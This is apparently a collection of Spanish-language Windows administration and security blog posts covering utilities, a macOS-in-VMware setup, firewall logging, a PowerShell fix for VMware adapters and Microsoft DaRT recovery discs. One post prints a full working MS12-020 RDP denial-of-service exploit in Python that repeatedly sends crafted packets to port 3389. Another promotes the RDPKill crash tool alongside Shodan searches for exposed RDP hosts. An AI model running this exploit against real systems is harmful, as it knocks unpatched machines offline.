Para hacerlo desde el CMD de Windows, podemos por ejemplo utilizar el paquete Unix Utils este paqute lo copiamos en C:\Windows\System32, así que podemos hacer la llamada desde el cmd de Windows, ya tenemos algo muy potente que usamos en GNU-Linux adaptado a Windows.

También tenemos las utilidades de Nirsoft y las de Sysinternals, estas utilidades nos brindan una administración para casi cualquier cosa, además de utilidades aparte. Para mantener estas utilidades actualizadas al día, podemos usar por ejemplo Windows System Control Center, este software nos bajará ya demás nos actualizará las versiones que tengamos bajadas, de manera que siempre tendremos las herramientas actualizadas.

Si nuestro sistema es 64 bits, nos bajará las utilidades de 64 bits por lo que podremos incluso trabajar con la versión adecuada a nuestro sistema.

Otras de las herramientas que también uso mucho es sincronizar herramientas por SVN, como cliente para Windows estoy enamorado de TortoiseSVN, lo uso para sincronizar herramientas alojadas en Code Google por ejemplo

Si quiero seguridad en mis datos puedo usar por ejemplo Bitlocker para Windows, eso me proporciona difrado en partición o en discos duros externos, como USB.

Para ejecutar archivos .pl de perl y .py de python, además de poder usarlo desde la consola de Windows uso Active Perl y Active Python, muy útil, la verdad.

Estos son algunas de las utilidades que utilizo cuando me instalo un sistema Windows.

Muy buenas a todos/as!

En el pequeño laboratorio que me estoy montando quería también incluir a MAC OS X Lion para poder hacer las auditorías, temas de malware etc…

Hay bastantes tutoriales de como añadir MAC OS X en VMWare 8, pero todo son problemas…

Así que expondré los pasos seguidos para poder tener la última versión de MAC OS X Lion y además que se pueda actualizar a la última versión, totalmente funcional.

Como requisitos:

• Última versión de VMWare
• Unlocker para VMWare
• VMWare tools para MAC
• VMDK para hacer la instalación, lo encontraremos por Google
• Sonido para el Lion

Los pasos a seguir es que, con el Unlocker aplicaremos un parche a VMWare para poder instalar y configurar MAC OS X Lion en VMWare 8.

Aplicamos el parche

Después de aplicar el parche, creamos la máquina virtual y en el momento de elegir el disco, escogemos el VMDK que nos hemos descargado préviamente.

Una vez cargado el VMDK, solo tendremos que iniciar la máquina virtual y instalar Lion. Una vez instalado, instalamos la VMWare tools descargadas antes.

Con las VMWare tools conseguiremos mejor resolución de pantalla, además de las carpetas compartidas con la máquina host.

Por último añadiremos los drivers de audio descargados en la parte de requisitos, lo instalaremos y actualizaremos el sistema.

Como resultado tendremos la última versión de Lion funcionando perfectamente!

Saludos cordiales

Muy buenas a todos/as!

Hace unos días estuve hablando de la vulnerabilidad de escritorio remoto.

En la entrada exponía un script en Python para causar la denegación de servicio.

Ahora Mark dePalma ha sacado una herramienta que se llama RDPKill que explota la vulnerabilidad de Escritorio Remoto.

Hay que elegir el target y el puerto remoto y dale a Kill sencillo no?

Podemos ver el uso…

La herramienta acaba causando un BSOD en el equipo remoto.

Por otro lado tenemos otra página web. que se llama RDPCheck!

Esta web coge nuestra IP Pública y metiendo el correo comprueba si nuestro RDP es vulnerable o no, podemos acceder aquí

RDPcheck

Nos envía un reporte a nuestro correo

Y no olvidéis que, mediante Shodan, se pueden encontrar hosts que usen RDP

Búsqueda de Shodan

Hasta aquí el artículo de hoy!

Saludos

Muy buenas a todos/as!

Hace unos días salió la noticia de un fallo en el RDP de Microsoft.

Este fallo, es explotable, Microsoft ya publicó en marzo el boletín MS12-020 que soluciona los errores en RDP que habían sido puestos en su conocimiento a través de fuentes privadas.

Ya hay varios Pastebin con el código explotable para la vulnerabiliad, podemos ver el resumen de la vulnerabilidad aquí.

De los múltiples exploits que me he encontrado he hecho la prueba con uno de ellos.

Lo he probado contra una máquina Windows XP SP3

El código del exploit:

# ms12-020 smaller
# I reduced the needed payload to DOS, the crashed is caused by buf2
# bp RDPWD!NM_Disconnect // crash is after this
#
# freenode #ms12-020

import socket
import sys
import time

#init
buf0 = “030000130ee000000000000100080000000000″.decode(‘hex’)
#MCS: Connection-initial
buf1 = “030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0″.decode(‘hex’)
#payload
buf2 = “0300000802f08028″.decode(‘hex’)

package = buf0+buf1+buf2

HOST = sys.argv[1]
PORT = 3389
for i in range(10000):
print i
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((HOST,PORT))
try:
s.send(package)
rec = s.recv(1024)
except:
pass
s.close()

Al ejecutarlo la máquina Windows remota se reinicia.

En el enlace anterior sobre la información de la vulnerabilidad podréis encontrar los parches correspondientes.

Saludos!

Muy buenas a todos/as!

En mis andaduras de configurción del Firewall de Windows 7, me encontraba con el problema de que a veces no sabía si un paquete estaba recibiendo un DROP un allow. Los firewalls en general conocen 3 estados para la decisión con un paquete:

Allow: El paquete mediante una regla preestablecida deja pasar hacia fuera

Drop:Se deniega el paso del paquete y no manda respuesta de ello

Reject:Se deniega el paso de ese paquete, manda un ICMP como destino inalcanzable

El log de Firewall de Wndows 7 es bastante sencillo de interpretar, así que mientras hacía mis pruebas y al mas estilo Unix, con Cygwin me hice un sh para ir comprobando los paquetes. Para activar el LOG en Firewall hemos de ir a la utilidad wf.msc con permisos de administrador.

Si obervamos la imagen tenemos que ir al menú de Propiedades de Firewall

Aqui tenemos los 3 perfiles del firewall, cada perfil se establece en un área de red que heos definido cuando nos conectamos a una red. En el caso de dominio normalmente  si trabajas en dominio en una empresa, privado en casa, por ejemplo y público en todo aquel sitio que no conozcas ni sea de tu confianza.

Aunque puede que cada pefil debería d estar configurado de una manera especial, creo que es bueno configurar el Firewall lo mas restringivo posible en todas las áreas, siendo así una medida de mitigación contra posibles ataques del exterior.

En el apartado de inicio de sesión:

Para cada uno de estos dominios, hemos de activar que registre los paquetes descartados y correctos. El log se guarda por defecto en:

/Windows/System32/LogFiles/Firewall/pfirewall.log

Como trabajo mucho con Cygwin, con un simple tail, podríamos ir viendo como se van registrando los paquetes:

#!/bin/bash

#Shell que hace un tail de las conexiones del Firewall

tail -f /cygdrive/c/Windows/System32/LogFiles/Firewall/pfirewall.log

Una utilidad mas por si hay alguien que queire probarlo

Muy buenas a todos/as!

Cuando me encontraba leyendo el libro de Sergio de los Santos “Máxima Seguridad en Windows” sabría que acabaría formateando el ordenador para acabar de instalarlo totálmente seguro y a mi gusto, con las recomendaciones de lo que supone para mi ahora una guía de como configurar un Windows de manera segura y sin antivirus .

Una de las muchas cosas que cambié es el tema del Firewall que viene integrado con Sistema en Windows 7, por defecto en los 3 perfiles, dominio, público y privado todo me basé en listas blancas para permitir la salida de programas hacia la red. Uno de los problemas que tuve es que, me quedé sin conexión a  Internet con VMWare. El problema de VMWare en Windows 7e s que las interfaces de red, vmnet, te las asigna como redes públicas y por lo tanto te quedas sin acceso a Internet.

Una solución para tener conexión a Internet es mediante un script en Power Shell que Windows no asigne las interfaces de red como públicas.

Podemos ver como Windows asigna las interfaces de red como públicas.

Te marca la red como red desconocida

El script en Power Shell es el siguiente:

# see <a href="http://msdn2.microsoft.com/en-us/library/bb201634.aspx">http://msdn2.microsoft.com/en-us/library/bb201634.aspx</a>
#
# *NdisDeviceType
#
# The type of the device. The default value is zero, which indicates a standard
# networking device that connects to a network.
#
# Set *NdisDeviceType to NDIS_DEVICE_TYPE_ENDPOINT (1) if this device is an
# endpoint device and is not a true network interface that connects to a network.
# For example, you must specify NDIS_DEVICE_TYPE_ENDPOINT for devices such as
# smart phones that use a networking infrastructure to communicate to the local
# computer system but do not provide connectivity to an external network.
#
# Usage: run in an elevated shell (vista/longhorn) or as adminstrator (xp/2003).
#
# PS&gt; .\fix-vmnet-adapters.ps1

# boilerplate elevation check

$identity = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = new-object Security.Principal.WindowsPrincipal $identity
$elevated = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)  

if (-not $elevated) {
    $error = "Sorry, you need to run this script"
    if ([System.Environment]::OSVersion.Version.Major -gt 5) {
        $error += " in an elevated shell."
    } else {
        $error += " as Administrator."
    }
    throw $error
}

function confirm {
$host.ui.PromptForChoice("Continue", "Process adapter?",
[Management.Automation.Host.ChoiceDescription[]]@("&amp;No", "&amp;Yes"), 0) -eq $true
}

<!-- Adkit freestyle placement -->[adkit: zone="freestyle" limit="1" list="0"] <br><br><br> [netshelter]# adapters key
pushd 'hklm:\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}' 

# ignore and continue on error
dir -ea 0  | % {
    $node = $_.pspath
    $desc = gp $node -name driverdesc
    if ($desc -like "*vmware*") {
        write-host ("Found adapter: {0} " -f $desc.driverdesc)
        if (confirm) {
new-itemproperty $node -name '*NdisDeviceType' -propertytype dword -value 1
        }
    }
}
popd

# disable/enable network adapters
gwmi win32_networkadapter | ? {$_.name -like "*vmware*" } | % {

# disable
    write-host -nonew "Disabling $($_.name) ... "
    $result = $_.Disable()
    if ($result.ReturnValue -eq -0) { write-host " success." } else { write-host " failed." }
    # enable
    write-host -nonew "Enabling $($_.name) ... "
    $result = $_.Enable()
    if ($result.ReturnValue -eq -0) { write-host " success." } else { write-host " failed." }
}

Este script se ha power shell se ha de ejecutar con Power Shell.

Las redes VMNet se ha de marcar el Y para aplicar la configuración.

ya tenemos las redes como enabled

Y hasta aquí la solución al problema

Referencias

Saludos!

Muy buenas a todos/as!

Desde siempre cuando nos hemos dedicado al mantenimiento de sistemas, nos hemos encontrado con los procesos svchost. Nadie a primera vista que son estos procesos. Para poder saber de que se encargan exactamente podemos usar svchostviewer.

Svchostviewer está alojado en codeplex, podemos descargarlo de aquí.

Cuando lo ejecutamos empieza a recopilar información de nuestro sistema de los procesos svchost

Aquí podemos ver los diferentes procesos svchost a que se dedican exactamente. Además nos da una descripción de que significa el proceso.

También tenemos dos opciones mas con svchostviewer

Podemos abrir los servicios de Windows, por si queremos detener o iniciar alguno.

Y también podemos sacar un report de los svchost de la máquina

Ya tenemos un report de los svchost de la máquina.

Sin duda una aplicación interesante.

Un saludo

Muy buenas a todos/as!

Tenemos varias maneras de comprobar la seguridad de Internet Explorer. Hoy os traigo una utilidad de Microsoft para comprobar la seguridad de Internet Explorer e incluso poder exportar los resultados.

La utilidad se llama IEZoneAnalyzer

Algunas imágenes sobre la utilidad.

Desde la utilidad podemos acceder a todas las zonas que hay en Internet Explorer.

Ahora por ejemplo, cambiaremos la página de Inicio

Ya tenemos la página cambiada en Internet Explorer.

Ahora exportaremos la configuración de una zona, para poder revisar la configuración.

Ya no hay excusa para volver a configurar la seguridad de Internet Explorer.

Un saludo

Muy buenas a todos/as!

Siguiendo con la entrada de ayer, en la que creábamos la imagen de DaRT, para poder usarla.

Grabamos la imagen ISO en un CD y arrancamos desde él.

Cuando inciamos el CD, nos pregunta si queremos habilitar conexión de red.

En nuestro caso le dado a Yes.

Si queremos poder buscar cosas dentro de nuestro PC local, tendremos que habilitarlo.

Elegimos la configuración del teclado.

Como cuando iniciamos un CD de recovery, DaRT buscará las instalaciones existentes en la máquina.

Igual que con un CD de recuperación, tenemos las mismas opciones y, además tenemos las opciones ofrecidas por DaRT al final.

Elegimos la ultima opción

Si necesitamos editar el registro podemos hacerlo desde aquí.

Tenemos también disponible un explorador de archivos.

Como ya hacíamos con ERD Commander o Hirens boot, podíamos cambiar el password de las cuentas de la máquina.

DaRT dispone de un Wizard para solventar algunos problemas con los que nos podamos encontrar.

Con las debugging tools somos capaces de poder analizar los .dump que nos salen cuando ahy un pantallazo azul

Como hemos habilitado la red, podríamos asignarle la Ip que quisiéramos aquí.

Si hemos perdido algún archivo porque ha sido eliminado por error, podemos intentar recuperarlo.

A veces en entorno corporativo, la instalación de un Hotfix puede provocar un mal funcionamiento de alguna aplicación. Podríamos quitarlo desde aquí.

Si nos ocurre que perdemos el gestor de arranque, podemos recuperarlo desde aquí.

Si por lo que sea necesitamos de reprar los archivos de sistema en Windows podemos usar SFC incluído como utilidad.

Para que no puedan recuperar nuestra información podemos usar esta utilidad y hacer un wipe al disco duro.

Si necesitaramos buscar cualquier archivo en la máquina disponemos de un file search

Podemos obtener la información del equipo desde aquí

También tenemos una utilidad para la búsqueda del Malware, además podemos actualizar in situ, para poder encontrar los últimos virus

Como avisábamos en el POST anterior, comos capaces de habilitar las conexiones remotas.

Y hasta aquí las utilidades disponibles en DaRT.

Un saludo

Muy buenas a todos/as!

Si alguna vez nos ha tocado estar reparando PC’s, hemos tenido al final que armarnos con un kit para poder hacer casi de todo, de manera que no tengas problemas para solventar un problema que te encuentres.

Seguro que a todos os suena Hirens Boot, con este CD lleno de utlidades conseguimos solventar un amplio abanico de problemas.

Desde Microsoft ya está disponible DaRT, con esta utilidad nos facilitamos el area de protección y administración en el área de TI.

En este artículo veremos como crear la ISO de DaRT.

Para descargar DaRT podemos hacerlo desde aquí.

Una vez descargado el ejecutable instalamos DaRT.

Como casi cualquier instalación en Windows, le damos a Next.

DaRT necesita de archivos de neustro CD de Windows con el que instalamos el PC. Así que se los facilitamos meiante nuestro disco de instalación de Windows 7.

Nos avisa de que ahora procederá a la extración de archivos y que puede tardar unos minutos.

Podemos ver el proceso de extración de archivos y copiados del mismo.

Igual que si trabajaramos con MMC, podemos habilitar características de administración.

Sobretodo en entorno corporativo, si queremos acceder de manera remota podemos habilitarlo =)

Si nos da un pantallazo azul y necesitamos hacer debugging, podemos usar las Debugging tools de Microsoft, si las tenemos instaladas en el PC, podemos imoportarlas a DaRT.

Muchas veces el problema puede venir por el malware, que tengamos. Podemos aprovechar para actualizar las bases para poder hacer un scan mas tarde.

Si tenemos algún hardware que no venga en el startup de Windows, podemos importar el .inf aquí.

Aquí es dodne se creará la imagen de DaRT de manera temporal, si queremos añadir mas archivos podemos hacerlo.

Le ponemos el nombre a la ISO que vamos a crear.

Vemos el proceso de creación de la ISO.

Si ya tenemos el DVD listo para grabar podemos hacer que se grabe ya directamente.

Y finalmente ya tenemos  la ISO creada.

En el siguiente capítulo, podemos ver como trabajamos con DaRT

Un saludo